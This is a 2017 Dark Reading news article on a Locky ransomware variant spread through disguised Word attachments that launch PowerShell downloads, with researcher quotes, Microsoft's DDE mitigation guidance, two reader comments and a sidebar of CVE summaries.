Endpoint
11/10/2017
03:10 PM
Connect Directly
Twitter
LinkedIn
Google+
RSS
E-Mail
50%
50%

New Locky Ransomware Takes Another Turn

A newly discovered strain of Locky ransomware has been discovered masquerading as legitimate Microsoft Word documents.

Another evolution of Locky ransomware is spreading through malicious attachments disguised as legitimate documents from productivity applications like Microsoft Word and Libre Office.

Researchers at Avira Virus Lab detected the ransomware earlier this week. This form of Locky has the same ".asasin" extension as a strain PhishMe picked up in October. However, it's crafted to manipulate users with a reportedly "protected document" disguised as this:

(Image: Avira)

(Image: Avira)

Users who double-click the image prompt a series of actions, which ultimately result in their files being encrypted under the ".asasin" file extension name. Multiple other files, with payment details, are written onto the disk.

Behind the image from the Word document, researchers saw a LNK file, otherwise known as a Windows shortcut. They realized the shortcut is intended to run a PowerShell script, which downloads another PowerShell script from an embedded link and runs it.

The second script connects to the Internet and downloads a Windows executable file, which includes several stages of code obfuscation and misleading data to trick victims and analysts into thinking the file is clean and from a legitimate Microsoft application.

Once it's on the victim's machine, the malware collects information about the operating system and sends it, encrypted, to the command-and-control server and retrieves the encryption key.

"We are seeing a rapid evolution in the way Locky is delivered," says Brendan Griffin, threat intelligence manager and malware analyst at PhishMe. "Locky stays the same, but the delivery techniques is where we've really seen the most change."

Evolution of Locky: What does it mean?

Ransomware is a growing problem for many organizations, and Locky is a common attack to watch.

"Locky has been one of the most popular malware libraries for a long time," says John Pironti, president of IP Architects. "It has been maturing, and that doesn't surprise me because it has been successful in financial gain."

It's common to see adversaries refresh and renew old approaches to see which is most effective, he continues. Attackers will slightly change their links or scripting to initiate activities to get to the same payload. The idea is to avoid detection and trick more users.

It's "misleading" to call this recent finding a new strain of Locky, Griffin adds. The ".asasin" strain, which PhishMe also detected, is a more robust and more verbose script application delivery than other forms of Locky seen in the past. It collects basic information off the machine; nothing personally identifiable. This is the same malware arriving on a different path.

"We've seen people embed scripts inside of Word documents, Excel links, things like that as a way to generate code and scripts that can grab more malware packages," Pironti says. People are more likely to open an attachment, the vector in Avira's finding, than they are to click a link.

"We spend so much time telling people not to click links … and not nearly as much time telling them not to click attachments," Pironti adds. Many employees click attachments all day as part of their jobs; to them, Word or Excel files aren't as suspicious as a potentially phishy link.

He notes that the ".asasin" extension is amusing. "They want to work off fear and force people to pay," he says.

This evolution also underscores how attackers often revert to simple techniques, Griffin adds. They're taking advantage of the fact that phishing emails, while basic, work. "Why would they choose a really complex, sophisticated, unreliable means of delivering malware?" he says.

Defending against fake applications

Griffiin points out that this is a clear example of abuse of Microsoft's Dynamic Data Exchange (DDE), a protocol on which Microsoft just published guidance for users.

Earlier this week, Microsoft published an advisory, following activity by Fancy Bear, which abused DDE fields to distribute malware. Microsoft is not planning to issue a patch but has provided steps for administrators to disable DDE, a protocol for transferring data between applications. If exploited, an attacker could assume control of an affected system.

Admins can turn off DDE by creating and setting registry entries for Microsoft Office based on the applications installed on the system. After this, data will no longer update automatically between applications, which could be problematic for people who rely on data feeds to update Excel. Microsoft warns doing this incorrectly could cause serious problems that would require reinstallation of the operating system.

Related Content:

Join Dark Reading LIVE for two days of practical cyber defense discussions. Learn from the industry’s most knowledgeable IT security experts. Check out the INsecurity agenda here.

Kelly Sheridan is Associate Editor at Dark Reading. She started her career in business tech journalism at Insurance & Technology and most recently reported for InformationWeek, where she covered Microsoft and business IT. Sheridan earned her BA at Villanova University. View Full Bio

Comment  | 
Print  | 
More Insights
Comments
Threaded  |  Newest First  |  Oldest First
DaraSingh
33%
67%
DaraSingh,
User Rank: Apprentice
11/11/2017 | 9:28:51 AM
Locky Ransomware attacks
This attack is of very dengerous kind. If your file is locked with locky then your had lost your data and no ways to recover, only the way is if you have the backup of your data then ok.

I faced this situation three times and found that if it enters into your network then only the option is to identify the sytem and remove it immediately form the network else your Network PCs data are going into the dustbin.Sometimes it also encrypt the video and audio files but depending on the programs files formats going to be affecting.

The best way is to use your network safely with proper antivirus and don't install the unnecessary programs and adwares which have the loopholes into its design architecture. If your are a tech giant and want to face the such an problem then you can try locky..... GOOD luck and happy readings.

 

 
kenomouth64
100%
0%
kenomouth64,
User Rank: Apprentice
11/13/2017 | 8:52:08 AM
Possible Improvised Solution
  • At my company we supported 200 client's IT Infrastructure. Well, at least 1 client a week was getting infected with locky, luckily we had backups in each case. However it was still concerning that locky was slipping past the security controls in place. So we developed a "programmitic Block" which prevents any files from writing to the appdata folder. 
  • So, we figured out that for most strains of locky they will right to the appdata folder for install by default. So we just prevent anything from writing to this folder. It has created a few issues but we irnoed those out. It has been working for the clients for  year now. No New infections since it was implemented.
Microsoft Word Vuln Went Unnoticed for 17 Years: Report
Kelly Sheridan, Associate Editor, Dark Reading,  11/14/2017
Companies Blindly Believe They've Locked Down Users' Mobile Use
Dawn Kawamoto, Associate Editor, Dark Reading,  11/14/2017
121 Pieces of Malware Flagged on NSA Employee's Home Computer
Kelly Jackson Higgins, Executive Editor at Dark Reading,  11/16/2017
Register for Dark Reading Newsletters
White Papers
Video
Cartoon
Current Issue
Managing Cyber-Risk
An online breach could have a huge impact on your organization. Here are some strategies for measuring and managing that risk.
Flash Poll
[Strategic Security Report] How Enterprises Are Attacking the IT Security Problem
[Strategic Security Report] How Enterprises Are Attacking the IT Security Problem
Enterprises are spending more of their IT budgets on cybersecurity technology. How do your organization's security plans and strategies compare to what others are doing? Here's an in-depth look.
Twitter Feed
Dark Reading - Bug Report
Bug Report
Enterprise Vulnerabilities
From DHS/US-CERT's National Vulnerability Database
CVE-2017-0290
Published: 2017-05-09
NScript in mpengine in Microsoft Malware Protection Engine with Engine Version before 1.1.13704.0, as used in Windows Defender and other products, allows remote attackers to execute arbitrary code or cause a denial of service (type confusion and application crash) via crafted JavaScript code within ...

CVE-2016-10369
Published: 2017-05-08
unixsocket.c in lxterminal through 0.3.0 insecurely uses /tmp for a socket file, allowing a local user to cause a denial of service (preventing terminal launch), or possibly have other impact (bypassing terminal access control).

CVE-2016-8202
Published: 2017-05-08
A privilege escalation vulnerability in Brocade Fibre Channel SAN products running Brocade Fabric OS (FOS) releases earlier than v7.4.1d and v8.0.1b could allow an authenticated attacker to elevate the privileges of user accounts accessing the system via command line interface. With affected version...

CVE-2016-8209
Published: 2017-05-08
Improper checks for unusual or exceptional conditions in Brocade NetIron 05.8.00 and later releases up to and including 06.1.00, when the Management Module is continuously scanned on port 22, may allow attackers to cause a denial of service (crash and reload) of the management module.

CVE-2017-0890
Published: 2017-05-08
Nextcloud Server before 11.0.3 is vulnerable to an inadequate escaping leading to a XSS vulnerability in the search module. To be exploitable a user has to write or paste malicious content into the search dialogue.